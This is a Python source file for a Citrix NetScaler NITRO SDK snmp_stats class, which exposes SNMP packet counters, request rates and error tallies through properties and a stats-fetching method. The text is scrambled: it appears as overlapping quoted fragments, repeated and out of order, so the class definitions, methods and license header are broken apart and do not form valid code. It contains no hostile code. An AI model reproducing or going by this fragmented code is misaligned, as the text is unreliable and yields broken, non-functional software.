# See the License for", "= 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def", "e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared", ": return self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self) :", "except Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter", "self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap", "0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0", "packets that were dropped because they appeared outside of the authoritative SNMP engine's", "version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise e @property def", "that was unknown to the NetScaler or otherwise unavailable. \"\"\" try : return", "= basic, full.\"\"\" try : return self._clearstats except Exception as e: raise e", "try : return self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self)", "that was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception", "(/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise", "(result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message),", "self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests", "writing, software # distributed under the License is distributed on an \"AS IS\"", "return self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP", ": return self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self) :", "except 
Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received,", "received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise e @property def", ": return self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self) :", "were dropped because they appeared outside of the authoritative SNMP engine's window.\"\"\" try", "\"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message", ":param clearstats: \"\"\" try : self._clearstats = clearstats except Exception as e: raise", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", ": return self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self) :", ": return self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self) :", "because they referenced a user that was not known to the SNMP engine.\"\"\"", "License. # You may obtain a copy of the License at # #", "e : raise e def _get_object_name(self) : \"\"\"Returns the value of object identifier", "except Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1", "try : return self._snmpdecryptionerrors except Exception as e: raise e @property def snmptotresponses(self)", "== 444) : service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") : raise", "= clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP", "the statsistics / counters :param clearstats: \"\"\" try : self._clearstats = clearstats except", "self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity", "limitations under the License. 
# from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response", ": \"\"\"Number of ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\"", "clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try :", "compliance with the License. # You may obtain a copy of the License", "try : return self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self)", "Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e: raise e @property def", "value = \"\") \"\"\" try : obj = snmp_stats() if not name :", "not name : response = obj.stat_resources(service, option_) return response except Exception as e:", "snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested a security level", "Version 2.0 (the \"License\") # you may not use this file except in", "of ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\" try :", "except Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that", "def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that represented an", "Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were", "= 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs =", "self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs", ": return self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self) :", "snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception", "= \"\") :param option_: (Default value = \"\") \"\"\" try : obj =", ": service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") : raise 
nitro_exception(result.errorcode, str(result.message),", "SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try : return", "(the \"License\") # you may not use this file except in compliance with", "fetch the statistics of all snmp_stats resources that are configured on netscaler. :param", ": \"\"\"SNMP packets that were dropped because they could not be decrypted.\"\"\" try", "e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP community", "@property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception", "\"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e:", ": \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try : return", "been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise", "get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics of", "e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except", "\"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e:", "name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as", "that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as", "configured on netscaler. 
:param service: :param name: (Default value = \"\") :param option_:", "because they referenced an SNMP engine ID that was not known to the", "def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts", "Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for", "0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0", "raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were", "except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that", "__init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity", "e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and", "been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise", "return self._snmpdecryptionerrors except Exception as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP", "received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise e", "not use this file except in compliance with the License. 
# You may", "of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as", "Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were", "\"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats", "except Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that", "self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request", ": \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate", "snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0", "Exception as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that", ": \"\"\"SNMP packets that were dropped because they requested a security level that", "e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced", "snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception", "0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0", "were dropped because they referenced an SNMP engine ID that was not known", "\"\"\" try : obj = snmp_stats() if not name : response = obj.stat_resources(service,", "the SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception", "nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts", "option_=\"\") : \"\"\"Use this API to fetch the statistics of all snmp_stats resources", "= 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics /", "self._snmpdecryptionerrors except Exception as e: raise e @property def 
snmptotresponses(self) : \"\"\"SNMP Get-Response", "option_) return response except Exception as e: raise e class Clearstats: \"\"\" \"\"\"", "e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because", "try : return self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self)", "packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise e @property", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "@property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate", "response = obj.stat_resources(service, option_) return response except Exception as e: raise e class", "= 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate =", "Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics", "except Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number", "e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return", "Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were", "snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise e @property def", "statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats except Exception", "return self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP", "Exception as e : raise e def _get_object_name(self) : \"\"\"Returns the value of", ":param option_: (Default value = \"\") \"\"\" try : obj = snmp_stats() if", "value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise e @property def", "as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages 
received,", "\"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e:", "not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e:", "# you may not use this file except in compliance with the License.", "Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages", "for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise e @property", "or BER errors encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs", "value of object identifier argument\"\"\" try : return 0 except Exception as e", "from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\"", "License, Version 2.0 (the \"License\") # you may not use this file except", "agreed to in writing, software # distributed under the License is distributed on", "return self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate", "return self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate", ": return self._snmpdecryptionerrors except Exception as e: raise e @property def snmptotresponses(self) :", "raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they", "@property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could not", ":param service: :param name: (Default value = \"\") :param option_: (Default value =", "user that was not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername", "def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except", "raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e : raise e", 
"because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as", "\"\") \"\"\" try : obj = snmp_stats() if not name : response =", "Copyright (c) 2008-2015 Citrix Systems, Inc. # # Licensed under the Apache License,", "@property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when decoding", "self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for _ in range(length)]", "clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets", "raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received", "e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except", "SNMP community name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except", "# Unless required by applicable law or agreed to in writing, software #", "by applicable law or agreed to in writing, software # distributed under the", "an SNMP community name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname", "return self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate", "proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise e @property def", "e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced", "all snmp_stats resources that are configured on netscaler. 
:param service: :param name: (Default", "as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped", "known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "\"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e:", "received, which were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except", "except Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs", "def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could not be", ": response = obj.stat_resources(service, option_) return response except Exception as e: raise e", "\"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\" try : return", "argument\"\"\" try : return 0 except Exception as e : raise e @classmethod", "= \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1)", "was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as", "e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return", "were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as", "def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try", "return self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) :", "except Exception as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro", "e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return", "@property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that represented", "permissions and # 
limitations under the License. # from nitro.resource.base.base_resource import base_resource from", "that have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception", ": raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e : raise", "= \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp =", "file except in compliance with the License. # You may obtain a copy", ": \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as", "# Licensed under the Apache License, Version 2.0 (the \"License\") # you may", "as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have", "\"\"\"The total number of SNMP Messages received that represented an SNMP operation which", "SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise e @property", "that were dropped because they referenced an SNMP engine ID that was not", "@property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced a", "e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats:", "0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0", "self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets", "snmp_stats() if not name : response = obj.stat_resources(service, option_) return response except Exception", "raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted", "that represented an SNMP operation which was not allowed by the SNMP community", "raise e def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try", "counters.<br/>Possible values = basic, full.\"\"\" try : 
return self._clearstats except Exception as e:", "License for the specific language governing permissions and # limitations under the License.", "except Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that", "return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP", "snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self,", "of get request. :param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response,", "0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self)", "was unknown to the NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel", "= 0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values =", "as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\"", "to in writing, software # distributed under the License is distributed on an", "named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e: raise", "implied. 
# See the License for the specific language governing permissions and #", "for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise e def", "return self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP", "return self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP", "values = basic, full.\"\"\" try : return self._clearstats except Exception as e: raise", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param", "e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by", "dropped because they requested a security level that was unknown to the NetScaler", "= 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel =", "Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were", "for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise e @property", "and returns the object array in case of get request. 
:param service: :param", "\"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def", "2.0 (the \"License\") # you may not use this file except in compliance", "\"\"\"SNMP packets that were dropped because they requested a security level that was", "try : return 0 except Exception as e : raise e @classmethod def", "self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for", ": \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as", "0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0", "snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could not be decrypted.\"\"\"", "self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s)", "(/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise", ": return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self) :", "License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import", "to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise e", ": return self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats)", "accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise e", "(/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise", "and # limitations under the License. 
# from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource", "API to fetch the statistics of all snmp_stats resources that are configured on", "class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) :", "\"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise e", "\"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise e", "raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except", "result.snmp except Exception as e : raise e def _get_object_name(self) : \"\"\"Returns the", "try : return self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self)", "length=1) : self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity =", "try : return self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self)", "under the Apache License, Version 2.0 (the \"License\") # you may not use", "= 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs =", "or implied. # See the License for the specific language governing permissions and", "except Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that", "unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property", "they appeared outside of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow", "object and returns the object array in case of get request. :param service:", "0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0", "get request. 
:param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response,", "Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try", "Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try", "object array in case of get request. :param service: :param response: \"\"\" try", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "the statistics of all snmp_stats resources that are configured on netscaler. :param service:", "e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try", "as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try :", "import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\"", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "in writing, software # distributed under the License is distributed on an \"AS", "@property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for an", "except Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\"", "= 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear", "raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted", "e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because", "self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of", "unknown to the NetScaler or otherwise unavailable. 
\"\"\" try : return self._snmpunsupportedsecuritylevel except", "\"\"\"converts nitro response into object and returns the object array in case of", "== \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity))", "that were dropped because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors", "e def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try :", "\"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = []", "try : return self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self)", "0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "level that was unknown to the NetScaler or otherwise unavailable. 
\"\"\" try :", "\"\"\"SNMP messages received, which used an SNMP community name not known to the", "Apache License, Version 2.0 (the \"License\") # you may not use this file", "basic, full.\"\"\" try : return self._clearstats except Exception as e: raise e @clearstats.setter", "def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try", "Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for", "which was not allowed by the SNMP community named in the Message.\"\"\" try", "return self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP", "community named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e:", "\"\"\"SNMP packets that were dropped because they appeared outside of the authoritative SNMP", "try : return self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self)", "that were dropped because they did not contain the expected digest value.\"\"\" try", "base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception", "e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return", "packets received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise e @property", "e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try", "return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service, response) :", "digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise e @property", "counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise e", "dropped because they appeared outside of the authoritative SNMP engine's window.\"\"\" try :", "NetScaler.\"\"\" try : 
return self._snmptotresponses except Exception as e: raise e @property def", "engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise e @property def", "could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise", "for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e:", "you may not use this file except in compliance with the License. #", "try : self._clearstats = clearstats except Exception as e: raise e @property def", "except Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that", "response into object and returns the object array in case of get request.", "are configured on netscaler. :param service: :param name: (Default value = \"\") :param", "\"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs", "0 except Exception as e : raise e @classmethod def get(cls, service, name=\"\",", "dropped because they referenced an SNMP engine ID that was not known to", ": raise e def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\"", ": self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0", "referenced an SNMP engine ID that was not known to the NetScaler.\"\"\" try", "snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that represented an SNMP", "(Default value = \"\") :param option_: (Default value = \"\") \"\"\" try :", "= 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps =", "packets that were dropped because they referenced a user that was not known", "the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e: raise e @property", "\"\"\" try : self._clearstats = clearstats except Exception as e: raise e @property", "\"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for _ 
in", "packets that were dropped because they did not contain the expected digest value.\"\"\"", "return self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP", "e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been", ": \"\"\"SNMP packets that were dropped because they did not contain the expected", "e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because", "by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e: raise e", "they referenced an SNMP engine ID that was not known to the NetScaler.\"\"\"", "use this file except in compliance with the License. # You may obtain", "otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e", "e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try", "as e : raise e def _get_object_name(self) : \"\"\"Returns the value of object", "messages received, which used an SNMP community name not known to the NetScaler.\"\"\"", "snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception", "have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e:", "\"\"\"SNMP packets that were dropped because they referenced a user that was not", "\"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs", "raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try :", ": return self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self) :", "referenced a user that was not known to the SNMP engine.\"\"\" try :", "if not name : response = obj.stat_resources(service, option_) return response except Exception as", "444) : service.clear_session(self) if 
